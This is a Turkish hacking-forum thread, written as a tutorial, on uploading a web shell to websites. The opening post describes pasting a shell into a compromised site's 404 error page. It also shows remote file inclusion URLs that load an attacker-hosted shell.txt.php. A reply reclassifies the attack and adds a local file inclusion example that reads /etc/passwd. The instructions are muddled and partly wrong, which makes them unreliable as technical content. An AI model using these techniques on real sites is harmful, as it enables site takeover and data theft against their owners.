THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

LFI açığı ile Shell upload

isor1234 - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
08/2018
Nereden:
New York
Mesajlar:
447
Konular:
101
Teşekkür (Etti):
42
Teşekkür (Aldı):
36
Ticaret:
(0) %
12-09-2018 16:05
#1
Exclamation
LFI açığı ile Shell upload
selamun aleyküm arkadaşlar bugün sizlerle shell nasıl atmayı göstericem benim kulladığım shelli şurdan indirin bir site admin paneline girin ve hata günlükleri olcak mesela örnek sitemiz

http://siteadresim.com bu sitenin bilgilerini ele geçirdiniz ve hata günlüğüne giriyoruz ben en çok 404 hatasını yapıyorum girdinizya shelli oraya basalım bastığımızda entere tıklayalım şimdi ise
http://siteadresim.com/404.htlm ekliyoruz sitenenin sonuna ama yazılanları silmiyoruz sonuna ekliyoruz ve shell attığımız site önümüzde veya 2 yöntemide vardır

sitede LFI açıklığı bulmaktır
lfi kısaca
site.com/include.php?file=https://www.google.com/securtiy_websites.php
gibi bir site budluk örneğin (google örnek tabikide neyse)
url yi değiştiriyosunuz (url olmaya bilir örn : site.com/include.php?file=/admin.php ve include.php olmakta şart değil)
shell url mizi koyuyoruz örneğin
site.com/include.php?file=http://seninsiten.com/shell.txt
shell iniz txt olsun çünkü başka hackerler sizin web sitenizi hackler
O YÜZDEN SONUNA .php EKliyouz
site.com/include.php?file=http://seninsiten.com/shell.txt.php
(NOT : olmassa .php siliniz)

umarım beğenmişinizdir tamamen ben tarafından yapıldı bunları bana öğretenlerdende teşekkür ederim
Konu firehackturk tarafından (12-09-2018 16:25 Saat 16:25 ) değiştirilmiştir.
M3m0ry Teşekkür etti.
M3m0ry - ait Kullanıcı Resmi (Avatar)
Junior Çevirmen
Üyelik tarihi:
06/2017
Mesajlar:
4.014
Konular:
296
Ticaret:
(0) %
12-09-2018 16:08
#2
Merhaba Değerli Kardeşim. Şimdi Senin Konuna Giren Birsi Okumak İtsemez.

1. Neden: Renklendirme, Konu Düzeni ve Fotoğraf Yok

2. Neden: Sheel ne ? Onu Mesela Açıklasaydın Daha İyi Olabilirdi. Yada Mesela En Güzeli Video Çekseydin. Eminim Bunları Uygularsan Konuna Çok Daha Fazla Ziyaretçi Gelir. İyi Günler. Ellerine Sağlık
isor1234 - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
08/2018
Nereden:
New York
Mesajlar:
447
Konular:
101
Teşekkür (Etti):
42
Teşekkür (Aldı):
36
Ticaret:
(0) %
12-09-2018 16:11
#3
Alıntı:
M3m0ry´isimli üyeden Alıntı Mesajı göster
Merhaba Değerli Kardeşim. Şimdi Senin Konuna Giren Birsi Okumak İtsemez.

1. Neden: Renklendirme, Konu Düzeni ve Fotoğraf Yok

2. Neden: Sheel ne ? Onu Mesela Açıklasaydın Daha İyi Olabilirdi. Yada Mesela En Güzeli Video Çekseydin. Eminim Bunları Uygularsan Konuna Çok Daha Fazla Ziyaretçi Gelir. İyi Günler. Ellerine Sağlık
teşekkür ederrim efendim beni bilgilendirdiniz sağolun
M3m0ry Teşekkür etti.
TomRiddleBlack - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2016
Mesajlar:
1.222
Konular:
130
Teşekkür (Etti):
338
Teşekkür (Aldı):
208
Ticaret:
(0) %
14-09-2018 11:59
#4
senin orda anlatmaya çalıştığın rfi, remote file inclusion.

lfi, local file inclusion

örnek istersen url üzerinde açık, şu tarz olur genelde;

site.co/file.php?view=/etc/passwd
---------------------
بِسْــــــــــــــــــــــمِ اﷲِارَّحْمَنِ ارَّحِيم

జ్ఞ*ా
ExeOweR Teşekkür etti.
isor1234 - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
08/2018
Nereden:
New York
Mesajlar:
447
Konular:
101
Teşekkür (Etti):
42
Teşekkür (Aldı):
36
Ticaret:
(0) %
14-09-2018 12:53
#5
Alıntı:
TomRiddleBlack´isimli üyeden Alıntı Mesajı göster
senin orda anlatmaya çalıştığın rfi, remote file inclusion.

lfi, local file inclusion

örnek istersen url üzerinde açık, şu tarz olur genelde;

site.co/file.php?view=/etc/passwd
bilgilendirdiğin için teşekkür ederim

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler